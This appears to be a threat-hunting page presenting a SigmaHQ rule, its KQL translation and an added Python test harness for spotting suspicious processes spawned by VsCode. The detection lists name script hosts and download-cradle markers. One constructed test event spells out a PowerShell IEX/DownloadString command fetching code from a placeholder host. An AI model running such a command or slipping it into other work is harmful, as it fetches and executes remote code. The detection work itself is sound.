
Potentially Suspicious Child Process Of VsCode

sigma · MEDIUM · SigmaHQ
T1218 · T1202
imProcessCreate
persistence
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
Retrieved: 2026-05-23T11:00:00Z · Confidence: medium

Hunt Hypothesis

Detects uncommon or suspicious child processes spawned by a VsCode "code.exe" process. This could indicate an attempt at persistence via VsCode tasks or terminal profiles.

Detection Rule

Sigma (Original)

title: Potentially Suspicious Child Process Of VsCode
id: 5a3164f2-b373-4152-93cf-090b13c12d27
status: test
description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
references:
    - https://twitter.com/nas_bench/status/1618021838407495681
    - https://twitter.com/nas_bench/status/1618021415852335105
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-26
modified: 2023-10-25
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\code.exe'
    selection_children_images:
        Image|endswith:
            - '\calc.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_children_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-Expressions'
            - 'IEX'
            - 'Invoke-Command'
            - 'ICM'
            - 'DownloadString'
            - 'rundll32'
            - 'regsvr32'
            - 'wscript'
            - 'cscript'
    selection_children_paths:
        Image|contains:
            # Add more suspicious locations
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - ':\Temp\'
    condition: selection_parent and 1 of selection_children_*
falsepositives:
    - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
level: medium

KQL (Azure Sentinel)

imProcessCreate
| where (ParentProcessName endswith "\\code.exe" or ActingProcessName endswith "\\code.exe")
    and (
        (TargetProcessName endswith "\\calc.exe"
            or TargetProcessName endswith "\\regsvr32.exe"
            or TargetProcessName endswith "\\rundll32.exe"
            or TargetProcessName endswith "\\cscript.exe"
            or TargetProcessName endswith "\\wscript.exe")
        or ((TargetProcessName endswith "\\powershell.exe"
                or TargetProcessName endswith "\\pwsh.exe"
                or TargetProcessName endswith "\\cmd.exe")
            and (TargetProcessCommandLine contains "Invoke-Expressions"
                or TargetProcessCommandLine contains "IEX"
                or TargetProcessCommandLine contains "Invoke-Command"
                or TargetProcessCommandLine contains "ICM"
                or TargetProcessCommandLine contains "DownloadString"
                or TargetProcessCommandLine contains "rundll32"
                or TargetProcessCommandLine contains "regsvr32"
                or TargetProcessCommandLine contains "wscript"
                or TargetProcessCommandLine contains "cscript"))
        or (TargetProcessName contains ":\\Users\\Public\\"
            or TargetProcessName contains ":\\Windows\\Temp\\"
            or TargetProcessName contains ":\\Temp\\")
    )
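To check what the Sigma rule and its KQL translation actually fire on before enabling them, the following Python reproduces the rule's three selections (suspicious child images, shell with suspicious command line, suspicious image path) and runs them over a handful of constructed process-creation events. This is an added example, not code from SigmaHQ or from the feed; the event shape, the `ProcessEvent` class and the sample events are assumptions made here, and the matching mirrors Sigma's default case-insensitive `endswith`/`contains` semantics.

```python
"""Reference implementation of the 'Potentially Suspicious Child Process Of VsCode'
rule, applied to constructed events. Added example; not SigmaHQ's code."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterable, Optional

# Values copied from the rule's selections (backslashes doubled for Python strings).
PARENT_SUFFIX = "\\code.exe"
SUSPICIOUS_CHILD_IMAGES = (
    "\\calc.exe", "\\regsvr32.exe", "\\rundll32.exe", "\\cscript.exe", "\\wscript.exe",
)
SHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")
SHELL_CLI_MARKERS = (
    "Invoke-Expressions", "IEX", "Invoke-Command", "ICM", "DownloadString",
    "rundll32", "regsvr32", "wscript", "cscript",
)
SUSPICIOUS_PATHS = (":\\Users\\Public\\", ":\\Windows\\Temp\\", ":\\Temp\\")


@dataclass
class ProcessEvent:
    """Minimal process-creation event (assumed field set, not a real log schema)."""
    parent_image: str
    image: str
    command_line: str


def _ends_with_any(value: str, suffixes: Iterable[str]) -> bool:
    # Sigma string modifiers are case-insensitive by default.
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value: str, needles: Iterable[str]) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


def matches_rule(ev: ProcessEvent) -> Optional[str]:
    """Return the name of the first child selection that matches, or None.

    Implements: selection_parent and 1 of selection_children_*
    """
    if not ev.parent_image.lower().endswith(PARENT_SUFFIX):
        return None  # selection_parent failed; nothing else matters
    if _ends_with_any(ev.image, SUSPICIOUS_CHILD_IMAGES):
        return "selection_children_images"
    if _ends_with_any(ev.image, SHELL_IMAGES) and _contains_any(ev.command_line, SHELL_CLI_MARKERS):
        return "selection_children_cli"
    if _contains_any(ev.image, SUSPICIOUS_PATHS):
        return "selection_children_paths"
    return None


def hunt(events: Iterable[ProcessEvent]) -> list[tuple[int, str]]:
    """Return (event index, matching selection) for every event the rule fires on."""
    return [(i, hit) for i, ev in enumerate(events) if (hit := matches_rule(ev))]


# Constructed sample events (not real telemetry). Index 0 is a benign build task,
# index 4 has a non-VsCode parent; the rest exercise one selection each.
VSCODE = "C:\\Program Files\\Microsoft VS Code\\Code.exe"
SAMPLE_EVENTS = [
    ProcessEvent(VSCODE, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c npm run build"),
    ProcessEvent(VSCODE, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')\""),
    ProcessEvent(VSCODE, "C:\\Windows\\System32\\rundll32.exe", "rundll32.exe placeholder.dll,Entry"),
    ProcessEvent(VSCODE, "C:\\Users\\Public\\tasks\\helper.exe", "helper.exe"),
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\calc.exe", "calc.exe"),
]

if __name__ == "__main__":
    for idx, selection in hunt(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {selection}: {ev.image} <- {ev.parent_image}")
```

Running it reports events 1, 2 and 3 and stays silent on the `npm run build` task and on the calc.exe launched from explorer.exe. Because `contains` is case-insensitive, the short tokens `IEX` and `ICM` can also match inside unrelated command-line text, which is one reason the rule's own false-positive note recommends trimming the lists to what your developers actually run from VsCode tasks.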

Required Data Sources

Sentinel Table     Notes
imProcessCreate    Ensure this data connector is enabled

False Positive Guidance

MITRE ATT&CK Context

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml